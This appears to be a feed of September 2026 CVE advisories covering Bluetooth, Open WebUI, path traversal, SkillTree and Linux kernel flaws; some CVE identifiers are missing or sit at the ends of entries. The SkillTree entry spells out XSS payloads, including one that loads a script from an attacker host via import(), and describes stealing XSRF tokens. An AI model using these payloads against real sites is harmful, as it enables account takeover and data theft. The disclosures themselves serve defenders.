    CVE-2026-15460

    Last Modified: 10 Sept 2026

The Bluetooth Classic (BR/EDR) L2CAP receive handler bt_l2cap_br_recv() in subsys/bluetooth/host/classic/l2cap_br.c dispatched inbound data PDUs based only on the destination channel ID, without checking that the target channel had reached the BT_L2CAP_CONNECTED state. A dynamic channel is assigned its RX CID and added to the connection's channel list while still in BT_L2CAP_CONNECTING (and later BT_L2CAP_CONFIG) — before configuration completes and, for PSMs that require security, before the peer is authenticated (l2cap_br_conn_req()). Because the channel is already findable by bt_l2cap_br_lookup_rx_cid() during this window, a remote peer within radio range can send a data PDU addressed to that CID and have it processed on a not-yet-established channel. The dispatch keys off channel fields (BR_CHAN(chan)->rx.mode, rx.mps) that are only initialized during configuration by l2cap_br_conf(); since channel objects are pooled and bt_l2cap_br_chan_del() does not reset rx.mode or the reassembly buffer _sdu, a reused channel can carry stale state into the CONNECTING window and route the frame into the retransmission/flow-control path (bt_l2cap_br_ret_fc_recv()) with stale parameters and a possibly stale _sdu pointer. The impact is delivery of attacker data to upper-layer protocol handlers on a half-open (and possibly unauthenticated) channel, plus operation on stale or partially initialized channel state on reused channel objects — leading to channel/link teardown (denial of service) and, in the stale-_sdu case, a dangling-pointer condition. The fix adds an explicit BR_CHAN(chan)->state < BT_L2CAP_CONNECTED guard that drops any data received before the channel is fully connected.

    CVE-2026-88002

    Last Modified: 10 Sept 2026

Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.5.0 until 0.11.1, the message-chain reconstruction helper in backend/open_webui/utils/misc.py advanced through a chat history by map key but tracked visited entries using each message body's optional id field. An authenticated user could store id-less messages in a parent cycle and trigger a non-terminating walk that blocked the async event loop, grew memory until termination, and remained persistent across process restarts. This issue is fixed in version 0.11.1.

    CVE-2026-88001

    Last Modified: 10 Sept 2026

Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, server-side web fetches did not reapply WEB_FETCH_FILTER_LIST or private-address controls to HTTP redirect destinations when AIOHTTP_CLIENT_ALLOW_REDIRECTS was enabled. An authenticated user could redirect the aiohttp and requests fetch paths to excluded hosts, loopback, private networks, or cloud metadata services and route resulting content into web search, URL ingestion, page-fetch tools, or chat image processing. This issue is fixed in version 0.11.1.

    CVE-2026-88069

    Last Modified: 10 Sept 2026

Pandora contains a path traversal vulnerability in its archive extraction worker. When processing a specially crafted archive or disk image, attacker-controlled file paths could be used without ensuring that the resulting destination remained within the intended extraction directory. An attacker able to submit a malicious file for analysis could use path traversal sequences or crafted paths to cause extracted content to be written outside the designated extraction directory, potentially overwriting files accessible to the Pandora worker process. Successful exploitation could result in unauthorized modification of application or system files, denial of service, and potentially further compromise depending on the permissions of the Pandora process and the files that can be overwritten. The vulnerability is addressed by resolving each extraction destination path before writing and verifying that it remains below the expected extraction directory. Extraction attempts resolving outside this directory are rejected and reported as path traversal attempts.

    Last Modified: 10 Sept 2026

Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, DELETE /api/v1/chats/{id}/messages/{message_id} used the chat-history deletion helper in backend/open_webui/models/chats.py to follow childrenIds without recording visited message identifiers. An authenticated user could store a cyclic chat tree and delete a message, causing a synchronous infinite loop on the server request loop that blocked every user's requests until the process was killed. Prior to 0.11.1, POST /api/v1/retrieval/process/web and POST /api/v1/retrieval/process/web/search in backend/open_webui/retrieval/web/utils.py treated Python's globally routable address classification as proof that a destination was external. An authenticated user could make an Azure-hosted instance fetch and return content from 168.63.129.16, the Azure platform channel, as well as other reserved ranges that the standard classification did not reject. CVE-2026-53956

    Last Modified: 10 Sept 2026

Rattler is a library that provides common functionality used within the conda ecosystem. `rattler_cache` prior to version 0.9.0 and `py-rattler` prior to version 0.24.0 were vulnerable to package-cache path traversal when handling package metadata from conda channels. During cache materialization, the `ratter_cache` code used the package record `build` string as part of a cache key that was joined into a filesystem path. A malicious or untrusted channel could publish repodata with path separators or traversal components in that field, causing package contents to be written outside the configured package cache directory. The issue requires use of a malicious or otherwise untrusted conda channel. Curated channels that validate package metadata are not expected to allow malformed build strings of this form. Users should upgrade to `rattler_cache` version 0.9.0 or `py-rattler` version 0.24.0 and avoid untrusted conda channels.

alf.io is an open source ticket reservation system for conferences, trade shows, workshops, and meetups. An Improper Access Control issue in versions prior to 2.0-M5-2605 allows an organization owner to read system-level configuration secrets through organization/event scoped "single configuration" endpoints. The affected endpoints require organization or event ownership, but they accept an arbitrary configuration key and then return the first matching value from a lookup that includes system-level configuration. As a result, an organization owner can retrieve secrets intended to be administrator-only, including the system API key when it is configured. Version 2.0-M5-2605 fixes the issue.

    CVE-2026-54694

    Last Modified: 10 Sept 2026

SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action — delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.

    CVE-2026-80925

    Last Modified: 11 Sept 2026

In the Linux kernel, the following vulnerability has been resolved: vlan: fix skb_under_panic and races when toggling HW VLAN offload Toggling hardware VLAN TX offload (NETIF_F_HW_VLAN_CTAG_TX or NETIF_F_HW_VLAN_STAG_TX) on a lower device invokes vlan_transfer_features(), which dynamically changed vlandev->hard_header_len. This causes two issues: 1. Lockless TX paths (e.g. packet_snd in af_packet.c, ip6_finish_output2) read dev->hard_header_len without holding RTNL lock. Mutating hard_header_len dynamically under RTNL creates a data race where upper layers reserve insufficient headroom based on a stale hard_header_len, resulting in skb_under_panic when vlan_dev_hard_header() is called. 2. In addition, vlan_transfer_features() updated hard_header_len without updating header_ops, causing a mismatch between allocated headroom and header creation. Always setting dev->hard_header_len = real_dev->hard_header_len and dev->needed_headroom = real_dev->needed_headroom + VLAN_HLEN unconditionally ensures: - dev->hard_header_len remains 100% static and immutable at real_dev->hard_header_len, eliminating all dynamic runtime updates and data races on hard_header_len. - Upper layers allocating skbs via LL_RESERVED_SPACE() will always reserve sufficient headroom for software VLAN tag insertion (real_dev->hard_header_len + real_dev->needed_headroom + VLAN_HLEN). - vlandev inherits real_dev->needed_tailroom so underlying trailer/padding/ICV requirements are honored. - AF_PACKET SOCK_RAW network header offsets remain correctly aligned at real_dev->hard_header_len. - vlan_header_ops is used unconditionally. Note to stable teams: Make sure to backport these commits: e16e960d55a4 ("ipvlan: inherit needed_headroom and needed_tailroom from phy_dev") cef51860becd ("macvlan: inherit needed_headroom and needed_tailroom from lowerdev")

In the Linux kernel, the following vulnerability has been resolved: xhci: dbgtty: Fix unregister on tty_register_driver() failure If tty_register_driver() fails, it drops the reference, but fails to set the global dbc_tty_driver to NULL, causing the unregister to be called again when module exits. On module unload dbc_tty_exit() only gates its cleanup on the driver pointer being non-NULL, so it operates on the already-freed driver: module_init(xhci_hcd_init) xhci_hcd_init() xhci_dbc_init() [return value ignored] dbc_tty_init() tty_register_driver() fails tty_driver_kref_put() -> driver freed (dbc_tty_driver left dangling) ... module_exit(xhci_hcd_fini) xhci_hcd_fini() xhci_dbc_exit() dbc_tty_exit() if (dbc_tty_driver) -> true (dangling) tty_unregister_driver() -> use-after-free

    Last Modified: 10 Sept 2026

In the Linux kernel, the following vulnerability has been resolved: KVM: s390: vsie: zero stale crypto bits When shadowing crypto access bits from a format0 apcb (crycb 0 or 1), the bits 64..255 are unchanged from whatever is in the vsie page in the crycb and thus in the apcb. This gives a nested guest potential access to a device no longer available. Zero out the remaining bits.

    CVE-2026-80920

    Last Modified: 9 Sept 2026

In the Linux kernel, the following vulnerability has been resolved: io_uring: defer eventfd signaling when queued from a wakeup handler io_req_local_work_add() signals the CQ ring eventfd inline when it is the one to push the first entry onto ->work_list. For DEFER_TASKRUN rings that add is frequently done from a waitqueue wakeup handler, where an arbitrary waitqueue lock is held. eventfd_signal_mask() only refuses to recurse when current->in_eventfd is set, but that bit is set by eventfd_signal_mask() itself. If the wake chain starts somewhere else, signal goes out inline and can feed back into epoll. Add IOU_F_TWQ_IN_WAKE, set it on the task_work add done from the three waitqueue callbacks, and use it to force io_eventfd_signal() down the existing call_rcu_hurry() deferral instead of signaling inline.

In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix recursive ww_mutex acquire in amdgpu_devcoredump_format When dumping IB contents from a hung job, amdgpu_devcoredump_format() acquired the VM root PD's reservation via amdgpu_vm_lock_by_pasid() and then, for each IB, called amdgpu_bo_reserve() on the BO backing the IB. Both reservations are reservation_ww_class_mutex objects and neither used a ww_acquire_ctx, which trips lockdep: WARNING: possible recursive locking detected -------------------------------------------- kworker/u128:0 is trying to acquire lock: ffff88838b16e1f0 (reservation_ww_class_mutex){+.+.}-{4:4}, at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu] but task is already holding lock: ffff8882f82681f0 (reservation_ww_class_mutex){+.+.}-{4:4}, at: amdgpu_devcoredump_format+0x1594/0x23f0 [amdgpu] Possible unsafe locking scenario: CPU0 ---- lock(reservation_ww_class_mutex); lock(reservation_ww_class_mutex); *** DEADLOCK *** May be due to missing lock nesting notation Workqueue: events_unbound amdgpu_devcoredump_deferred_work [amdgpu] Call Trace: __ww_mutex_lock.constprop.0 ww_mutex_lock amdgpu_bo_reserve amdgpu_devcoredump_format+0x1594 [amdgpu] amdgpu_devcoredump_deferred_work+0xea [amdgpu] The two reservations are on different BOs in the captured trace, so the splat is a lockdep-correctness warning, not an observed deadlock. It becomes a real self-deadlock whenever the IB BO shares its dma_resv with the root PD (the always-valid case, see amdgpu_vm_is_bo_always_valid()): amdgpu_bo_reserve(abo) re-acquires the same ww_mutex without a ticket and blocks forever. With amdgpu.gpu_recovery=0 the timeout handler refires every ~2 s and each invocation produces this splat, drowning the kernel ring buffer. Now that amdgpu_vm_lock_by_pasid() takes a drm_exec context, move the IB dumping into a separate helper that locks the root PD and every IB BO together in a single drm_exec ticket. DRM_EXEC_IGNORE_DUPLICATES handles IB BOs that share a dma_resv (e.g. always-valid BOs, or two IBs backed by the same BO). Every lock is now a top-level acquire under one ww_acquire_ctx, so the recursive ww_mutex condition is gone, and the per-IB amdgpu_bo_reserve()/amdgpu_bo_unref() dance -- including a BO refcount leak on the amdgpu_bo_reserve() failure path -- is removed.
